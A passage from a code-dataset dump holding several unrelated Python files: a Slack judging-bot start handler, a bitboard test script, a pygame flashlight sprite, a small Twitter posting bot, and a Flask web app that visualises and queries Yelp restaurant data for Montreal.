config.conv_handler\r\n\r\n\r\n@commands.on(\"start\")\r\ndef start(payload):\r\n channel = payload[\"channel_id\"]\r\n user_id = payload[\"user_id\"]\r\n state = conv_db.get_state(channel, user_id)\r\n\r\n if (state == config.TEAM_REMARKS) or (state == config.EDIT_REMARKS):\r\n config.web_client.chat_postMessage(\r\n channel=channel,\r\n text=f\"You can only end your judging process or reply with a photo of your remarks at this point, <@{user_id}>!\",\r\n )\r\n\r\n else:\r\n message = (\r\n f\"Hi <@{user_id}>! This Slack Bot provides helpful commands to assist SUTD What The Hack judges in collating candidate scores and judging notes.\\r\\n\\r\\n\"\r\n \"• /start to start the bot.\\r\\n\"\r\n \"• /judge to begin the judging sequence.\\r\\n\"\r\n \"• /edit to edit a previous judging decision.\\r\\n\"\r\n \"• /cancel to abandon the current ongoing conversation.\\r\\n\"\r\n \"• /summary to view your scoring progress so far.\\r\\n\"\r\n \"• /leaderboard to display the leaderboard.\\r\\n\"\r\n \"• /viewdb to display an overall view of the whole database.\\r\\n\"\r\n \"• /randomize to execute the group randomizer algorithm.\\r\\n\\r\\n\"\r\n \"For judges, please take note that your conversation state is different across different channels and workspaces.\\r\\n\"\r\n )\r\n config.web_client.chat_postMessage(channel=channel, text=message)\r\n\r\n return\r\n","sub_path":"app/handlers/utils/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"397895153","text":"import sys\ndef unsafe_x(player):\n\t#returns number of unsafe x pieces\n\tcount = 0\n\tif (1 << 9) & player and not (1 << 0) & player: count += 1\n\tif (1 << 14) & player and not (1 << 7) & player: count += 1\n\tif (1 << 49) & player and not (1 << 56) & player: count += 1\n\tif (1 << 54) & player and not (1 << 63) & player: count += 1\n\treturn count \n\ndef unsafe_xx(player):\n\t#returns number of unsafe x pieces\n\tcount = 0\n\tif (1 << 9) & player & (0 << 0): count += 1\n\tif (1 << 14) & player & (0 << 7): count += 1\n\tif (1 << 49) & player & (0 << 56): count += 1\n\tif (1 << 54) & player & (0 << 63): count += 1\n\treturn count \nvar = 0xC242000000000000\nprint(unsafe_x(var), unsafe_xx(var))","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"451921919","text":"import pygame, math as M\nfrom pygame import *\npygame.init()\n\n\nclass Flashlight(sprite.Sprite):\n def __init__(self, x, y, image, width=400, height=400):\n sprite.Sprite.__init__(self)\n self.x = x\n self.y = y\n self.w = width\n self.h = height\n self.image = image.convert_alpha()\n self.surface = pygame.Surface((400, 400), SWSURFACE, image)\n self.rect = Rect(x - width/2, y-height/2, width, height)\n self.image = image\n self.image = pygame.transform.rotate(self.image, 0).convert_alpha()\n self.image = pygame.transform.smoothscale(self.image, (self.w, self.h))\n self.displaying_image = image\n self.rect = self.image.get_rect()\n self.angle = 0\n self.condition = False\n self.charge_level = self.charge_max = 179\n self.charge_bg_im = pygame.image.load(\"data\\\\flashlight\\\\charge.gif\")\n self.charge_surface = pygame.Surface((179, 27))\n self.charge_surface.fill((255, 255, 0))\n\n def update(self, screen, mouse, player):\n if self.charge_level == 0:\n self.condition = False\n if self.condition:\n mouse.set_pressed()\n if mouse.pressed_buttons[0]:\n mouse.set_position()\n self.angle = M.degrees(M.atan2(mouse.position[1] - player.rect.centery,\n mouse.position[0] - player.rect.centerx))\n\n self.displaying_image = pygame.transform.rotozoom(self.image, -self.angle, 1)\n self.rect = self.displaying_image.get_rect()\n self.rect.center = (player.rect.centerx, player.rect.centery)\n if self.condition:\n screen.blit(self.displaying_image, self.rect)\n self.charge_level -= 0.15\n if self.charge_level <= 0:\n self.charge_level = 0\n self.charge_surface = pygame.Surface((self.charge_level, 27))\n self.charge_surface.fill((255, 255, 0))\n\n def show_cur_charge(self, screen):\n screen.blit(self.charge_bg_im, (20, 20))\n screen.blit(self.charge_surface, (65, 30))\n\n def turn(self):\n self.condition = not self.condition\n\n def refresh(self):\n self.condition = False\n self.charge_level = self.charge_max = 179\n self.charge_surface = pygame.Surface((179, 27))\n self.charge_surface.fill((255, 255, 0))\n\n\n\n","sub_path":"flashlight.py","file_name":"flashlight.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"108061657","text":"import twitter\nfrom local_settings import *\n\ndef connect():\n api = twitter.Api(consumer_key=MY_CONSUMER_KEY,\n consumer_secret=MY_CONSUMER_SECRET,\n access_token_key=MY_ACCESS_TOKEN_KEY,\n access_token_secret=MY_ACCESS_TOKEN_SECRET)\n return api\n\nif __name__==\"__main__\":\n api=connect()\n api.PostUpdate(\"hello world\")\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"205112671","text":"from flask import Flask, session, render_template, url_for, request, redirect\r\nfrom flask_wtf import FlaskForm\r\nfrom wtforms.fields.html5 import DateField\r\nfrom datetime import date\r\nimport gmplot\r\nfrom wtforms import SelectField, Form, StringField, validators, RadioField\r\nimport pandas as pd\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom bokeh.charts import BoxPlot, Bar, output_file, show, output_notebook\r\nfrom pandas.tools.plotting import table\r\nfrom wordcloud import WordCloud, STOPWORDS\r\nimport nltk\r\nimport numpy as np\r\nimport requests\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\nfrom sklearn.neighbors import NearestNeighbors\r\nfrom nltk.corpus import wordnet as wn\r\nfrom collections import Counter\r\nfrom wtforms import BooleanField\r\nfrom flask_wtf import Form\r\nfrom math import sqrt\r\nfrom scipy.misc import imread\r\nglobal text\r\nglobal label_food\r\nfrom bokeh.embed import autoload_server\r\nfrom bokeh.client import push_session, pull_session\r\nfrom bokeh.resources import Resources\r\nimport subprocess\r\nimport atexit\r\nimport platform\r\nimport time\r\n\r\n\r\n\r\napp = Flask(__name__)\r\n\r\napp.secret_key = 'Yelp'\r\n\r\nbusiness = pd.read_csv(\"Montreal.csv\",encoding = \"latin1\")\r\nuser = pd.read_csv(\"user.csv\")\r\nreview = pd.read_csv(\"review.csv\")\r\n\r\nuser[\"yelping_since\"]=pd.to_datetime(user[\"yelping_since\"])\r\nreview[\"review_len\"] = [len(t) for t in review[\"text\"]]\r\nfood = wn.synset('food.n.02')\r\nfoodlist=list(set([w for s in food.closure(lambda s:s.hyponyms()) for w in s.lemma_names()]))\r\n\r\nclass queryForm(FlaskForm):\r\n\tprice = SelectField('Price', choices=[('<10', '<10'), ('10~30', '10~30'), ('30~60', '30~60'),('>60','>60')])\r\n\tparking = SelectField('Parking', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tcategory = StringField('Categories', [validators.Length(min=1, max=40)])\r\n\taccess = SelectField('Access', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tdeliver = SelectField('Deliver', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\trsvp = SelectField('RSVP', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tmorning = SelectField('Morning', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tnoon = SelectField('Noon', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tevening = SelectField('Evening', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tnight = SelectField('Night', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\tgroup = SelectField('Group', choices=[('Not Necessary', 'Not Necessary'), ('Yes', 'Yes')])\r\n\r\nclass recommendForm1(FlaskForm):\r\n\tfunny = RadioField('Funny', choices=[('f1', 'Strongly disagree'), ('f2', 'Disagree'), ('f3', 'Neither agree nor disagree'), ('f4', 'Agree'), ('f5', 'Strongly agree')])\r\n\tcool = RadioField('Cool', choices=[('c1', 'Strongly disagree'), ('c2', 'Disagree'), ('c3', 'Neither agree nor disagree'), ('c4', 'Agree'), ('c5', 'Strongly agree')])\r\nclass recommendForm2(FlaskForm):\r\n\tcategory = StringField('Category', [validators.Length(min=1, max=40)])\r\n\ttime = SelectField('Time', choices=[('t1', 'morning'), ('t2', 'noon'), ('t3', 'evening'), ('t4', 'late night'), ('t5', 'not sure')])\r\n\tpurpose = SelectField('Purpose', choices=[('p1', 'dating'), ('p2', 'business'), ('p3', 'friends'), ('p4', 'families'), ('p5', 'single'), ('p6', 'tourist')])\r\n\r\nclass recommendForm3(FlaskForm):\r\n\tpic_choice = RadioField('Pic_choice', choices=[('p1', 'This is my favorite'), ('p2', 'This is my favorite'), ('p3', 'This is my favorite'), ('p4', 'This is my favorite'), ('p5', 'This is my favorite'), ('p6', 'This is my favorite'), ('p7', 'This is my favorite'), ('p8', 'This is my favorite')])\r\n\r\nclass recommendForm4(FlaskForm):\r\n\treviewOrstar = SelectField('ReviewOrstar', choices=[('r1', 'star'), ('r2', 'review')])\r\n\r\nclass reviewForm(FlaskForm):\r\n\tkeyword = StringField('Keyword', [validators.Length(min=1, max=40)])\r\n\r\nclass featureForm(Form):\r\n\tbox1=BooleanField('check1')\r\n\tbox2=BooleanField('check2')\r\n\tbox3=BooleanField('check3')\r\n\tbox4=BooleanField('check4')\r\n\tbox5=BooleanField('check5')\r\n\tbox6=BooleanField('check6')\r\n\tbox7=BooleanField('check7')\r\n\tbox8=BooleanField('check8')\r\n\tbox9=BooleanField('check1')\r\n\tbox10=BooleanField('check2')\r\n\tbox11=BooleanField('check3')\r\n\tbox12=BooleanField('check4')\r\n\tbox13=BooleanField('check5')\r\n\tbox14=BooleanField('check6')\r\n\tbox15=BooleanField('check7')\r\n\tbox16=BooleanField('check8')\r\n\tbox17=BooleanField('check1')\r\n\tbox18=BooleanField('check2')\r\n\tbox19=BooleanField('check3')\r\n\tbox20=BooleanField('check4')\r\n\tbox_all=BooleanField('all')\r\n\r\ndef get_homepage_links():\r\n\treturn [ {\"href1\": url_for('visualize'), \"label1\":\"A Glance at Data\"},\r\n\t\t\t\t{\"href2\": url_for('query'), \"label2\":\"Find Your Restaurants\"},\r\n\t\t\t\t{\"href3\": url_for('reviewpage'), \"label3\":\"Taste Food\"},\r\n\t\t\t\t{\"href4\": url_for('recommend0'), \"label4\":\"Recommendation\"},\r\n\t\t\t\t]\r\n\r\ndef get_links():\r\n\treturn [{\"href\": url_for('business1'), \"label\":\"Restaurants Heatmap\"},\r\n\t\t\t\t{\"href\": url_for('business2'), \"label\":\"Restaurants by Neighborhoods\"},\r\n\t\t\t\t{\"href\": url_for('business3'), \"label\":\"Restaurants by Stars\"},\r\n\t\t\t\t{\"href\": url_for('business4'), \"label\":\"Restaurants' Number of Reviews\"},\r\n\t\t\t\t{\"href\": url_for('user1'), \"label\":\"New Users Every Month\"},\r\n\t\t\t\t{\"href\": url_for('user2'), \"label\":\"Users' Average Stars\"},\r\n\t\t\t\t{\"href\": url_for('user3'), \"label\":\"Users' Number of Reviews\"},\r\n\t\t\t\t{\"href\": url_for('reviews1'), \"label\":\"Reviews Count Across Years\"},\r\n\t\t\t\t{\"href\": url_for('reviews2'), \"label\":\"Distribution of Stars\"},\r\n\t\t\t\t{\"href\": url_for('reviews3'), \"label\":\"Length of Review Texts\"},\r\n\t\t\t\t{\"href\": url_for('join1'), \"label\":\"Review Length and Review Count\"},\r\n\t\t\t\t{\"href\": url_for('join2'), \"label\":\"Review Length (Grouped by Stars of Businesses)\"},\r\n\t\t\t\t{\"href\": url_for('overview'), \"label\":\"Overview\"}\r\n\t\t\t\t]\r\n\r\ndef get_review_links(keyword):\r\n\treturn {\"href\": url_for('review_feature'), \"label\":\" Taste your favorate food at '%s' \" % keyword}\r\n\r\ndef get_recommend1_links():\r\n\treturn {\"href\": url_for('recommend1'), \"label\":\"Let's GO!\"}\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n\tsession[\"data_loaded\"] = True\r\n\treturn render_template('home.html', links=get_homepage_links())\r\n\r\n@app.route(\"/visualize/\", methods=['GET','POST'])\r\ndef visualize():\r\n\treturn render_template('visualization.html', links=get_links())\r\n\r\n@app.route(\"/visualize/overview/\", methods=['GET','POST'])\r\ndef overview():\r\n\tconnected = False\r\n\twhile not connected:\r\n\t\ttry:\r\n\t\t\tport = 5000+np.random.randint(0,100)\r\n\t\t\tsubprocess.Popen(['bokeh', 'serve', '--show', 'visualize.py', '--port',str(port)]) \r\n\t\t\tconnected = True\r\n\t\texcept:\r\n\t\t\tpass\r\n\treturn redirect(url_for('visualize'))\r\n\r\n@app.route(\"/visualize/business1/\", methods=['GET','POST'])\r\ndef business1():\r\n\tlatitudes = business[\"latitude\"]\r\n\tlongitudes = business[\"longitude\"]\r\n\tgmap = gmplot.GoogleMapPlotter.from_geocode(\"Montreal\",8)\r\n\tgmap.heatmap(latitudes, longitudes)\r\n\tgmap.draw('templates/Montreal.html')\r\n\treturn render_template('businessoutput1.html', mapfile = 'Montreal.html')\r\n\t\r\n@app.route(\"/visualize/business2/\", methods=['GET','POST'])\r\ndef business2():\r\n\tplt.clf()\r\n\tneighbordata = business[[\"business_id\",\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.strip('[]').strip(\"''\") for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace('\\\\xe9', str(\"\\xe9\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"u'\", \"\") for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\xe8\", str(\"\\xe8\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\xf4\", str(\"\\xf4\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\xe2\", str(\"\\xe2\")) for i in neighbordata[\"neighborhoods\"]]\r\n\tneighbordata[\"neighborhoods\"] = [i.replace(\"\\\\u\", \"\") for i in neighbordata[\"neighborhoods\"]]\r\n\tplt.figure(figsize=(15,5))\r\n\tax = sns.countplot(x=\"neighborhoods\", data=neighbordata, palette=\"GnBu_d\")\r\n\trects = ax.patches\r\n\tlabels = [l.get_text() for l in ax.xaxis.get_ticklabels()]\r\n\tfor rect, label in zip(rects, labels):\r\n\t height = rect.get_height()\r\n\t ax.text(rect.get_x() + rect.get_width()/2, height+20, label, ha='center', va='bottom',rotation=90, fontsize=9)\r\n\tax.xaxis.set_ticklabels([])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/business2.png')\r\n\treturn render_template('businessoutput2.html')\r\n\t\r\n@app.route(\"/visualize/business3/\", methods=['GET','POST'])\r\ndef business3():\r\n\tplt.clf()\r\n\tax = sns.countplot(x=\"stars\", data=business, palette=\"Blues\")\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/business3.png')\r\n\treturn render_template('businessoutput3.html')\r\n\r\n@app.route(\"/visualize/business4/\", methods=['GET','POST'])\r\ndef business4():\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tsns.plt.title(\"Restaurants' Number of Reviews\",fontsize=20)\r\n\tax1 = sns.distplot(business[\"review_count\"])\r\n\tfig1 = ax1.get_figure()\r\n\tfig1.savefig('static/business4_1.png')\r\n\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tsns.plt.title(\"Restaurants' Number of Reviews (Grouped by Stars)\",fontsize=20)\r\n\tax2 = sns.stripplot(x=\"stars\", y=\"review_count\", data=business)\r\n\tfig2 = ax2.get_figure()\r\n\tfig2.savefig('static/business4_2.png')\t\r\n\treturn render_template('businessoutput4.html')\r\n\r\n@app.route(\"/visualize/user1/\", methods=['GET','POST'])\r\ndef user1():\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tplt.xlabel('Months')\r\n\tplt.ylabel('# of New Users')\r\n\tplt.xticks(rotation=45)\r\n\tax = sns.countplot(x=\"yelping_since\", data=user,palette=\"GnBu_d\")\r\n\tticks = ax.xaxis.get_ticklocs()\r\n\txtl = [item.get_text()[:7] for item in ax.xaxis.get_ticklabels()]\r\n\tax.xaxis.set_ticks(ticks[::5])\r\n\tax.xaxis.set_ticklabels(xtl[::5])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/user1_1.png')\r\n\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tnewuser = user.groupby('yelping_since')\r\n\tmatplotlib.style.use('ggplot')\r\n\tplt.xlabel('Months')\r\n\tplt.ylabel('# of New Users')\r\n\tplt.xticks(rotation=45)\r\n\tax2 = newuser.size().plot()\r\n\tfig2 = ax2.get_figure()\r\n\tfig2.savefig('static/user1_2.png')\t\r\n\r\n\treturn render_template('useroutput1.html')\r\n\r\n@app.route(\"/visualize/user2/\", methods=['GET','POST'])\r\ndef user2():\r\n\tplt.clf()\r\n\tplt.xlim(xmin=0)\r\n\tplt.xlim(xmax=5)\r\n\tax = sns.distplot(user[\"average_stars\"])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/user2.png')\t\r\n\treturn render_template('useroutput2.html')\r\n\r\n@app.route(\"/visualize/user3/\", methods=['GET','POST'])\r\ndef user3():\r\n\tplt.clf()\r\n\tax = sns.distplot(user[\"review_count\"])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/user3.png')\t\r\n\treturn render_template('useroutput3.html')\r\n\r\n@app.route(\"/visualize/reviews1/\", methods=['GET','POST'])\r\ndef reviews1():\r\n\tplt.clf()\r\n\tnewreview = review[[\"business_id\", \"date\"]]\r\n\tnewreview[\"date\"]=pd.to_datetime(newreview[\"date\"])\r\n\tnewreview[\"newdate\"] = 100*newreview[\"date\"].dt.year + newreview[\"date\"].dt.month\r\n\tplt.figure(figsize=(15,5))\r\n\tax = sns.countplot(x=\"newdate\", data=newreview, palette=\"GnBu_d\")\r\n\tticks = ax.xaxis.get_ticklocs()\r\n\txtl = [item.get_text()[:7] for item in ax.xaxis.get_ticklabels()]\r\n\tax.xaxis.set_ticks(ticks[::5])\r\n\tax.xaxis.set_ticklabels(xtl[::5])\r\n\tplt.xlabel('Date')\r\n\tplt.ylabel('# of Reviews')\r\n\tplt.xticks(rotation=45)\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/reviews1.png')\r\n\treturn render_template('reviewsoutput1.html')\r\n\r\n@app.route(\"/visualize/reviews2/\", methods=['GET','POST'])\r\ndef reviews2():\r\n\tplt.clf()\r\n\tax = sns.countplot(x=\"stars\", data=review, palette=sns.cubehelix_palette(5))\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/reviews2.png')\t\r\n\treturn render_template('reviewsoutput2.html')\r\n\r\n@app.route(\"/visualize/reviews3/\", methods=['GET','POST'])\r\ndef reviews3():\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tplt.xlim(xmin=0)\r\n\tplt.xlim(xmax=5000)\r\n\tsns.plt.title(\"Length of Review Texts (Histogram)\",fontsize=20)\r\n\tax1 = sns.distplot(review[\"review_len\"])\r\n\tfig1 = ax1.get_figure()\r\n\tfig1.savefig('static/reviews3_1.png')\r\n\t\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tmatplotlib.style.use('seaborn-pastel')\r\n\tsns.plt.title(\"Length of Review Texts (Boxplot)\",fontsize=20)\r\n\tax2 = sns.boxplot(review['review_len'])\r\n\tfig2 = ax2.get_figure()\r\n\tfig2.savefig('static/reviews3_2.png')\r\n\r\n\tplt.clf()\r\n\tplt.figure(figsize=(15,5))\r\n\tplt.xticks(rotation=90)\r\n\tsns.plt.title(\"Length of Reviews v. Votes Useful\",fontsize=20)\r\n\tax3 = sns.stripplot(y=\"votes.useful\", x=\"review_len\", data=review, jitter=True)\r\n\tticks = ax3.xaxis.get_ticklocs()\r\n\txtl = [item.get_text() for item in ax3.xaxis.get_ticklabels()]\r\n\tax3.xaxis.set_ticks(ticks[::50])\r\n\tax3.xaxis.set_ticklabels(xtl[::50])\r\n\tfig3 = ax3.get_figure()\r\n\tfig3.savefig('static/reviews3_3.png')\r\n\r\n\treturn render_template('reviewsoutput3.html')\r\n\r\n@app.route(\"/visualize/join1/\", methods=['GET','POST'])\r\ndef join1():\r\n\tplt.clf()\r\n\tbusinessreview = pd.merge(business,review, on=\"business_id\", how=\"inner\")\r\n\tsub = businessreview[[\"business_id\",\"review_len\"]]\r\n\tavg = sub.groupby('business_id').mean()\r\n\tavg = avg.reset_index()\r\n\tm = pd.merge(business, avg, on=\"business_id\", how=\"inner\")\r\n\tg = sns.jointplot(x=\"review_count\", y=\"review_len\", data=m)\r\n\tg.savefig('static/join1.png')\t\r\n\treturn render_template('joinoutput1.html')\t\r\n\r\n@app.route(\"/visualize/join2/\", methods=['GET','POST'])\r\ndef join2():\r\n\tplt.clf()\r\n\tbusinessreview = pd.merge(business,review, on=\"business_id\", how=\"inner\")\r\n\tsub = businessreview[[\"business_id\",\"review_len\"]]\r\n\tavg = sub.groupby('business_id').mean()\r\n\tavg = avg.reset_index()\r\n\tm = pd.merge(business, avg, on=\"business_id\", how=\"inner\")\r\n\tplt.figure(figsize=(15,5))\t\r\n\tax = sns.boxplot(m['stars'],m['review_len'])\r\n\tfig = ax.get_figure()\r\n\tfig.savefig('static/join2.png')\t\r\n\treturn render_template('joinoutput2.html')\t\r\n\r\n@app.route('/query/',methods=['GET','POST'])\r\ndef query():\r\n\tform = queryForm()\r\n\tif form.validate_on_submit():\r\n\t\tcategory = request.form.get('category')\r\n\t\tprice = request.form.get('price')\r\n\t\tparking = request.form.get('parking')\r\n\t\taccess = request.form.get('access')\r\n\t\tdeliver = request.form.get('deliver')\r\n\t\trsvp = request.form.get('rsvp')\r\n\t\tmorning = request.form.get('morning')\r\n\t\tnoon = request.form.get('noon')\r\n\t\tevening = request.form.get('evening')\r\n\t\tnight = request.form.get('night')\r\n\t\tgroup = request.form.get('group')\r\n\r\n\t\tx1 = business[business['categories'].str.contains(category, case = False)]\r\n\t\r\n\t\tif price == \"<10\":\r\n\t\t\tcode = 1\r\n\t\tif price == \"10~30\":\r\n\t\t\tcode = 2\r\n\t\tif price == \"30~60\":\r\n\t\t\tcode = 3\r\n\t\tif price == \">60\":\r\n\t\t\tcode = 4\r\n\t\tx21 = x1[x1['attributes.Price Range'] == code]\r\n\t\tx22 = x1[x1['attributes.Price Range'].isnull()]\r\n\t\tx2 = pd.concat([x21, x22])\r\n\t\r\n\t\tif parking == \"Yes\":\r\n\t\t\tx3 = x2[x2['attributes.Parking.street'] == True]\r\n\t\tif parking == \"Not Necessary\":\r\n\t\t\tx3 = x2\r\n\r\n\t\tif access == \"Yes\":\r\n\t\t\tx4 = x3[x3['attributes.Wheelchair Accessible'] == True]\r\n\t\tif access == \"Not Necessary\":\r\n\t\t\tx4 = x3\r\n\r\n\t\tif deliver == \"Yes\":\r\n\t\t\tx5 = x4[x4['attributes.Delivery'] == True]\r\n\t\tif deliver == \"Not Necessary\":\r\n\t\t\tx5 = x4\r\n\r\n\t\tif rsvp == \"Yes\":\r\n\t\t\tx6 = x5[x5['attributes.Takes Reservations'] == True]\r\n\t\tif rsvp == \"Not Necessary\":\r\n\t\t\tx6 = x5\r\n\r\n\t\tif morning == \"Yes\":\r\n\t\t\tx7 = x6[x6['attributes.Good For.breakfast'] == True]\r\n\t\tif morning == \"Not Necessary\":\r\n\t\t\tx7 = x6\r\n\r\n\t\tif noon == \"Yes\":\r\n\t\t\tx8 = x7[x7['attributes.Good For.lunch'] == True]\r\n\t\tif noon == \"Not Necessary\":\r\n\t\t\tx8 = x7\r\n\r\n\t\tif evening == \"Yes\":\r\n\t\t\tx9 = x8[x8['attributes.Good For.dinner'] == True]\r\n\t\tif evening == \"Not Necessary\":\r\n\t\t\tx9 = x8\r\n\r\n\t\tif night == \"Yes\":\r\n\t\t\tx10 = x9[x9['attributes.Good For.latenight'] == True]\r\n\t\tif night == \"Not Necessary\":\r\n\t\t\tx10 = x9\r\n\r\n\t\tif group == \"Yes\":\r\n\t\t\tx11 = x10[x10['attributes.Good For Groups'] == True]\r\n\t\tif group == \"Not Necessary\":\r\n\t\t\tx11 = x10\r\n\t\t\r\n\t\trestaurant = x11.sort_values('stars', ascending = False)\r\n\r\n\t\tresult = restaurant[['name', 'full_address', 'stars','review_count']].reset_index().drop('index', 1)\r\n\r\n\t\tresult[\"name\"] = [i.replace('?', '') for i in result[\"name\"]]\r\n\r\n\t\tresult.to_csv(\"query.csv\")\r\n\r\n\t\tlat = list(restaurant[\"latitude\"])\r\n\t\tlnt = list(restaurant[\"longitude\"])\r\n\t\tgmap = gmplot.GoogleMapPlotter(np.mean(lat),np.mean(lnt),12)\r\n\t\t#gmap.scatter(lat, lnt, 'k', marker=True)\r\n\t\tgmap.scatter(lat, lnt, '#3B0B39', size=200, marker=False)\r\n\t\tgmap.draw(\"templates/searchmap.html\")\r\n\r\n\t\tconnected = False\r\n\t\t#port = 5000+np.random.randint(0,100)\r\n\r\n\t\twhile not connected:\r\n\t\t\ttry:\r\n\t\t\t\tport = 5000+np.random.randint(0,100)\r\n\t\t\t\t# if 'window' in platform.system().lower():\r\n\t\t\t\t# \tbokeh_process = subprocess.Popen(\r\n\t\t\t\t# \t\t'bokeh serve --show q.py --port %d'%(port), shell=False, stdout=subprocess.PIPE)\r\n\t\t\t\t# \tconnected = True\r\n\t\t\t\t# else:\r\n\t\t\t\tsubprocess.Popen(['bokeh', 'serve', '--show', 'q.py', '--port',str(port)]) \r\n\t\t\t\tconnected = True\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\t\ttime.sleep(6)\t\r\n\r\n\t\treturn render_template('queryoutput.html', mapfile='searchmap.html')\r\n\t\t#return render_template('queryoutput.html', )\r\n\t\t\r\n\treturn render_template('queryparams.html', form=form)\r\n\r\n\r\n@app.route('/review/',methods=['GET','POST'])\r\ndef reviewpage():\r\n\t\r\n\t# review-block-1: search_restaurant_function\r\n\tdef search_restaurant(keyword):\r\n\t\tN=len(business)\r\n\t\tsearch_result_name=list()\r\n\t\tfor i in range(0,N):\r\n\t\t\tif keyword.lower() in business.loc[i]['name'].lower():\r\n\t\t\t\tsearch_result_name.append(business.loc[i]['name']) \r\n\t\treturn business[business['name'].isin(list(search_result_name))]\r\n\r\n\t# review-block-2: get_review_fuction \r\n\tdef get_review(keyword):\r\n\t\tresult_frame=search_restaurant(keyword)\r\n\t\ttext=str()\r\n\t\tfor i in range(len(result_frame)):\r\n\t\t\tmyid=result_frame.iloc[i,16]\r\n\t\t\ttext=text+str(list(review[review['business_id']==result_frame.iloc[i,16]]['text']))\r\n\t\treturn text\r\n\r\n\t# review-block-3: get_cloud_fuction \r\n\tdef get_cloud(text,name):\r\n\t\tif len(text)<20:\r\n\t\t\treturn None\r\n\t\tdelete_words=[name.lower(),'food','restaurant',' one ','place',' really ',\\\r\n\t\t' go ',' year ',' come ',' the ',' a ','\\n',' is ',' are ',' of ',' le ',' de ',' la ',' place '\\\r\n\t\t' et ','side','plate','cut','green','heart','tongue']\r\n\t\tnewlist=list()\r\n\t\tfor word in delete_words:\r\n\t\t\ttext=text.replace(word,' ')\r\n\t\tfor word in text.split():\r\n\t\t\tif word in foodlist:\r\n\t\t\t\tnewlist.append(word)\r\n\t\tnewtext=' '.join(newlist)\r\n\t\twordcloud = WordCloud(stopwords=STOPWORDS,background_color='white',mask=imread('static/mask2.jpeg'),width=1200,height=1000).generate(newtext)\r\n\t\twordcloud.to_file(\"static/review_cloud_1.png\")\r\n\t\treturn newlist\r\n\r\n\t# review-block-4: main \r\n\tform = reviewForm()\r\n\tif form.validate_on_submit():\r\n\t\tkeyword = request.form.get('keyword')\r\n\t\tmyres=search_restaurant(keyword) #McDonald's, Marven's Restaurant\r\n\t\tif len(myres)>0:\r\n\t\t\tmyres=myres.sort_values(by=['stars','name'],ascending=False)\r\n\t\t\tplt.clf()\r\n\t\t\tax = sns.countplot(x=\"stars\", data=myres, palette=\"GnBu_d\")\r\n\t\t\tfig=ax.get_figure()\r\n\t\t\tsns.set(font_scale=1.5)\r\n\t\t\tave_star=round(np.mean(list(myres['stars'])),2)\r\n\t\t\tstd_star=round(np.std(list(myres['stars'])),2)\r\n\t\t\tresult=myres.loc[:,['name','full_address','stars']].head(45)\r\n\r\n\t\t\tlat = list(myres[\"latitude\"])\r\n\t\t\tlnt = list(myres[\"longitude\"])\r\n\t\t\tgmap = gmplot.GoogleMapPlotter(np.mean(lat),np.mean(lnt),12)\r\n\t\t\tgmap.scatter(lat, lnt, '#3B0B39', size=200, marker=False)\r\n\t\t\tgmap.draw(\"templates/reviewmap.html\")\r\n\t\t\tglobal text\r\n\t\t\ttext=get_review(keyword).lower()\r\n\t\t\tnewlist=get_cloud(text,keyword)\r\n\r\n\r\n\t\t\tcnt = Counter()\r\n\t\t\tplt.figure(figsize=(15,5))\r\n\t\t\tfor word in newlist:\r\n\t\t\t\tcnt[word]+=1\r\n\t\t\tfrequency_list=pd.DataFrame(list(cnt.items())).sort_values(1,ascending=False)\r\n\t\t\tmenu=list(pd.DataFrame(list(cnt.items()))[0].unique())\r\n\t\t\tcol=5\r\n\t\t\trow=len(menu)//col\r\n\t\t\tmenu=np.array(menu[0:col*row])\r\n\t\t\tmenu_list=pd.DataFrame(menu.reshape(row,col))\r\n\t\t\tif 